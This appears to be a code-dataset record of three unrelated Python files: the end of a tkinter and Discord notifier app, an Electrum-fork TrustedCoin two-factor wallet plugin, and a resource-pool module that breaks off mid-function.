self.paypal.configure(cursor="heart")
self.paypal.bind("<Button-1>", lambda x: self.open_link("https://paypal.me/QuentiumYT/"))
def close(self):
self.top.destroy()
def open_link(self, link):
if is_windows:
os.system("start " + link)
else:
os.system("xdg-open " + link)
# ANCHOR ProcessData class
class ProcessData:
def __init__(self):
if f_priority:
msg = f"Warning: Going to {f_desc} for {f_duration} in {f_when}."
else:
msg = f"Suggestion: Asking to {f_desc} in {f_when} for {f_duration}."
if is_bot_enabled:
async def exec_cmd(args):
for user_id in user_list:
await discord.utils.get(client.get_all_members(), id=int(user_id)).send(args)
try:
# Run in asyncio loop method a async function using args
# This allows to use async function without awaiting it
# Only issue is freezing the app while discord is sending the message
client.loop.run_until_complete(exec_cmd(msg))
except:
pass
def start_gui():
root = tk.Tk()
main_window = Main(root)
root.mainloop()
def start_bot():
@client.event
async def on_ready():
print("Running")
@client.command(pass_context=True)
async def up(ctx):
return await ctx.send("The bot is up!")
client.run(bot_token)
# ANCHOR Startup
if __name__ == "__main__":
if is_bot_enabled:
th = threading.Thread(target=start_gui)
th.start()
start_bot()
else:
start_gui()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bitcoin import TYPE_ADDRESS, is_new_seed, seed_type, is_any_2fa_seed_type
from electrum.bip32 import (deserialize_xpub, deserialize_xprv, bip32_private_key, CKD_pub,
serialize_xpub, bip32_root, bip32_private_derivation, xpub_type)
from electrum.crypto import sha256
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import STO_EV_USER_PW
from electrum.network import Network
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
_, depth, fingerprint, child_number, c, cK = bip32.deserialize_xpub(xpub)
xpub = bip32.serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
return xpub
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
return Network.send_http_on_proxy(method, url, params=data, headers=headers, on_finish=self.handle_response)
elif method == 'post':
return Network.send_http_on_proxy(method, url, json=data, headers=headers, on_finish=self.handle_response)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.KOINON_ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bip32._CKD_pub(cK, c, s)
return serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = CKD_pub(cK, c, num)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(cK)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(cK)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa'):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(repr(e)))
return
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise BaseException('unexpected seed type: {}'.format(seed_type))
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, xtype)
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise BaseException('unexpected seed type: {}'.format(t))
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
pools.py
|
"""Resource pools."""
__all__ = [
'ProcessActorPool',
'TimeoutPool',
]
import array
import collections
import contextlib
import dataclasses
import functools
import heapq
import inspect
import itertools
import logging
import multiprocessing
import multiprocessing.connection
import multiprocessing.reduction
import os
import socket
import threading
import time
import types
import weakref
from typing import Any, Dict, Tuple
from . import collections as g1_collections # pylint: disable=reimported
from .assertions import ASSERT
LOG = logging.getLogger(__name__)
class TimeoutPool:
"""Rudimentary timeout-based resource pool.
A pool that releases resources unused after a timeout.
NOTE: This class is not thread-safe.
"""
@dataclasses.dataclass(frozen=True)
class Stats:
num_allocations: int
num_concurrent_resources: int
max_concurrent_resources: int
def __init__(
self,
pool_size,
allocate,
release,
timeout=300, # 5 minutes.
):
# Store pairs of (resource, returned_at), sorted by returned_at
# in ascending order.
self._pool = collections.deque()
self._pool_size = pool_size
self._allocate = allocate
self._release = release
self._timeout = timeout
self._num_allocations = 0
self._num_concurrent_resources = 0
self._max_concurrent_resources = 0
def get_stats(self):
return self.Stats(
num_allocations=self._num_allocations,
num_concurrent_resources=self._num_concurrent_resources,
max_concurrent_resources=self._max_concurrent_resources,
)
def __enter__(self):
return self
def __exit__(self, *_):
self.close()
@contextlib.contextmanager
def using(self):
resource = self.get()
try:
yield resource
finally:
self.return_(resource)
def get(self):
"""Get a resource from the pool or allocate new one when empty.
This does not block nor raise when the pool is empty (if we want
to implement rate limit, we could do that?).
"""
to_allocate = not self._pool
if to_allocate:
resource = self._allocate()
self._num_allocations += 1
self._num_concurrent_resources += 1
max_concurrent_resources = max(
self._num_concurrent_resources, self._max_concurrent_resources
)
else:
# Return the most recently released resource so that the
# less recently released resources may grow older and then
# released eventually.
resource = self._pool.pop()[0]
max_concurrent_resources = self._max_concurrent_resources
try:
self.cleanup()
except Exception:
if to_allocate:
self._num_allocations -= 1
self._num_concurrent_resources -= 1
self._release(resource)
raise
self._max_concurrent_resources = max_concurrent_resources
return resource
def return_(self, resource):
"""Return the resource to the pool.
The pool will release resources for resources that exceed the
timeout, or when the pool is full.
"""
now = time.monotonic()
self._pool.append((resource, now))
self._cleanup(now)
def cleanup(self):
"""Release resources that exceed the timeout.
You may call this periodically to release old resources so that
pooled resources is not always at high water mark. Note that
get/return_ calls this for you; so if the program uses the pool
frequently, you do not need to call cleanup periodically.
"""
self._cleanup(time.monotonic())
def _cleanup(self, now):
deadline = now - self._timeout
while self._pool:
if (
len(self._pool) > self._pool_size
or self._pool[0][1] < deadline
):
self._release_least_recently_released_resource()
else:
break
def close(self):
"""Release all resources in the pool."""
while self._pool:
self._release_least_recently_released_resource()
def _release_least_recently_released_resource(self):
self._num_concurrent_resources -= 1
self._release(self._pool.popleft()[0])
class ProcessActorPool:
"""Process-actor pool.
stdlib's multiprocessing.pool.Pool is modeled after the executor
where workers are stateless. ProcessActorPool manages a pool of
stateful process-actors.
If an actor is not returned to the pool and is garbage collected,
the associated process and other resources will be automatically
returned to the pool or released.
NOTE: This class is not thread-safe.
"""
@dataclasses.dataclass(frozen=True)
class Stats:
num_spawns: int
num_concurrent_processes: int
max_concurrent_processes: int
current_highest_uses: int
_COUNTER = itertools.count(1).__next__
@dataclasses.dataclass(order=True)
class _Entry:
process: multiprocessing.Process = dataclasses.field(compare=False)
conn: multiprocessing.connection.Connection = \
dataclasses.field(compare=False)
negative_num_uses: int
def __init__(self, pool_size, max_uses_per_actor=None, context=None):
# Store processes, sorted by num_uses in descending order.
self._pool = []
self._pool_size = pool_size
# Store id(stub) -> entry. We store id(stub) to avoid creating
# a strong reference to the stub.
self._stub_ids_in_use = {}
self._max_uses_per_actor = max_uses_per_actor
self._context = context or multiprocessing.get_context()
self._num_spawns = 0
self._num_concurrent_processes = 0
self._max_concurrent_processes = 0
def get_stats(self):
if self._pool:
current_highest_uses = -self._pool[0].negative_num_uses
else:
current_highest_uses = 0
for entry in self._stub_ids_in_use.values():
num_uses = -entry.negative_num_uses
if num_uses > current_highest_uses:
current_highest_uses = num_uses
return self.Stats(
num_spawns=self._num_spawns,
num_concurrent_processes=self._num_concurrent_processes,
max_concurrent_processes=self._max_concurrent_processes,
current_highest_uses=current_highest_uses,
)
def __enter__(self):
return self
def __exit__(self, exc_type, *_):
self.close(graceful=not exc_type)
@contextlib.contextmanager
def using(self, referent):
stub = self.get(referent)
try:
yield stub
finally:
self.return_(stub)
def get(self, referent):
"""Get a stub from the pool or allocate new one when empty.
This does not block nor raise when the pool is empty (if we want
to implement rate limit, we could do that?).
"""
to_spawn = not self._pool
if to_spawn:
entry = self._spawn()
self._num_spawns += 1
self._num_concurrent_processes += 1
max_concurrent_processes = max(
self._num_concurrent_processes, self._max_concurrent_processes
)
else:
# Return the most often used process so that is will be
# released sooner (when max_uses_per_actor is set).
entry = heapq.heappop(self._pool)
max_concurrent_processes = self._max_concurrent_processes
try:
stub = _Stub(type(referent), entry.process, entry.conn)
stub_id = id(stub)
# Although this stub_id can be the same as another already
# collected stub's id (since id is just object's address),
# it is very unlikely that this id conflict will happen when
# the entry is still in the self._stub_ids_in_use dict as it
# requires all these to happen:
#
# * The old stub is collected.
# * The old stub's finalizer has not been called yet (is
# this even possible?).
# * The new stub is allocated, at the same address.
#
# But there is not harm to assert this will never happen.
ASSERT.setitem(self._stub_ids_in_use, stub_id, entry)
_BoundMethod('_adopt', entry.conn)(referent)
self._cleanup()
except Exception:
if to_spawn:
self._num_spawns -= 1
# self._num_concurrent_processes is decreased in
# self._release.
self._stub_ids_in_use.pop(stub_id)
self._release(entry)
raise
# TODO: self._return_id is non-reentrant, and thus is not safe
# in a finalize callback. How do we fix this?
weakref.finalize(stub, self._return_id, stub_id)
entry.negative_num_uses -= 1
self._max_concurrent_processes = max_concurrent_processes
return stub
def return_(self, stub):
"""Return the stub to the pool.
The pool will release actors for actors that exceed the
``max_uses_per_actor``, or when the pool is full.
"""
return self._return_id(id(stub))
def _return_id(self, stub_id):
